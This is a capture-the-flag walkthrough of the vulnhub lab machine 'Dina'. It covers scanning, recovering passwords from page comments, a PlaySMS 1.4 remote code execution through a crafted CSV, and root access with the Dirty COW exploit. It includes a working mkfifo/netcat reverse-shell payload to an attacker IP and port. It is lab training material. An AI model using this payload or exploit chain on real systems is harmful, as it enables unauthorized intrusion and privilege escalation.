Another great vulnhub virtual machine for beginners – especially for me :). It was fun to test this machine – so thank you Touhid!
I used nmap and nikto to gather some information.
+ Target IP: 192.168.1.132
+ Target Hostname: dina.lan
+ Target Port: 80
+ Using Encoding: Random URI encoding (non-UTF8)
+ Start Time: 2017-10-18 18:39:12 (GMT2)
+ Server: Apache/2.2.22 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 15:46:52 2017
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3268: /tmp/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ 7444 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2017-10-18 18:39:39 (GMT2) (27 seconds)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 5 disallowed entries
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
I have checked all paths above and found some interesting strings on /nothing. Found the following strings in the comment of the source code:
#my secret pass
It looks like we found some passwords. Nice. Let’s check the other path: /secure. It contains a passwords protected backup.zip file. So I tried the passwords above and successfully unpacked it with the password freedom.
I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
url : /SecreTSMSgatwayLogin
Ok check that secret SMS Gateway. Tried to login with the username touhid and with the passwords found earlier. The login pair was touhid:diana.
The first thing what I usually do when identify a web application is check exploit-db for available exploits.
PlaySMS 1.4 - 'import.php' Remote Code Execution | php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php' Remote Code Execution / Unrestricted File Upload | php/webapps/42003.txt
PlaySMS 1.4 - Remote Code Execution | php/webapps/42038.txt
PlaySms 0.7 - SQL Injection | linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting | php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions | php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion | php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery | php/webapps/30177.txt
This is all what I need. Touhid did a great job on finding the vulnerabilities in this application. At least 3 different kind of ways to run system commands through php system() function.
All right it’s time to get a remote shell.
Gaining remote shell
I tried to run system commands as described in 42044.txt. I was trying a lot, simply nc host port -e /bin/bash didn’t worked because this netcat was an openbsd version and “-e” option is missing from the openbsd version. A few minutes research and I had created a csv file with the following content:
$cmd='rm -f /tmp/f; mkfifo /tmp/f && cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.109 7777 > /tmp/f 2>&1';system($cmd); ?>,2,3
Luckily I got shell!!!
Running whoami told me that my current user is www-data. Okay, check the system. Running netstat -tlpn, a mysql server is running on this machine. In the SecreTSMSgatwayLogin directory was a config.php file. I checked this file and found the login and password pair for the database.
Then selected the playsms database and found the user table, and the password hashes:
| admin_78f3198ce97ae2bdddb15cc25d559c6f |
The findmyhash command didn’t find the password in the public database. I was too lazy to fire up oclhashcat and brute-force the hash, so moved on.
I cannot get higher privileges through mysql system command so I wanted another way to get root access.
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"
Okay let’s invite our dirty friend….
I am too lazy….Really… At this point I knew what to use…. I’ve got a little experience from earlier vulnhub machines and used the following exploit from exploit-db to enumerate privileges:40839.c
I was lucky, gcc was present on that machine and the exploit compiled without errors.
After a few minutes the root user firefart was created with the password 1234. Okay, check the root directory for the flag.
firefart@Dina:/# cat /root/flag.txt
\________\--------___ ___ ____----------/_________/
\_______\----\\\\\\ //_ _ \\ //////-------/________/
\______\----\\|| (( ~|~ ))) ||//------/________/
\_____\---\\ ((\ = / ))) //----/_____/
\____\--\_))) \ _)))---/____/
\__/ ((( (((_/
| -))) - ))
root password is : hello@3210
easy one …..but hard to guess…..
but i think u dont need root password……
u already have root shelll….
FLAG : 22d06624cd604a0626eb5a2992a6f2e6
Thank you Touhid M.Shaikh for the fun. It was a pleasure to play with this machine.